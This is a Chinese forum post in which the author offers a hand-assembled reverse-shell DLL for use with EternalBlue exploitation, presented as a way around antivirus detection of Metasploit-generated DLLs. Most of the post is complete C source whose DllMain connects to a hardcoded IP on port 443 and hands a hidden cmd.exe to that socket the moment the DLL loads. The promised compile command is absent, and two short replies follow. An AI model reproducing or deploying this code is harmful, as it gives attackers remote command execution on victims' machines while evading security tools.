前段时间，永恒之蓝很火，msf 生成的 dll 很容易被杀。网上找了一份反弹 shell 的代码，拼凑了一个 dll 反弹版（注意：回连的 IP/端口是写死的，而且走的是明文 TCP，测试时请改成自己的监听地址）。
#pragma comment(lib,"Ws2_32.lib") #include <WinSock2.h> #include <stdlib.h> WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { WSAStartup(MAKEWORD(2, 2), &wsaData); Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); hax.sin_family = AF_INET; hax.sin_port = htons(atoi("443")); hax.sin_addr.s_addr = inet_addr("192.168.2.13"); WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL); memset(&ini_processo, 0, sizeof(ini_processo)); ini_processo.cb = sizeof(ini_processo); ini_processo.dwFlags = STARTF_USESTDHANDLES; ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; CreateProcessA(NULL, "cmd.exe", TRUE, CREATE_NO_WINDOW, (LPSTARTUPINFOA)&ini_processo, &processo_info); return TRUE; }
使用 gcc（MinGW）编译，命令如下：
我这边也找了好几个
@ver007 你也在这里啊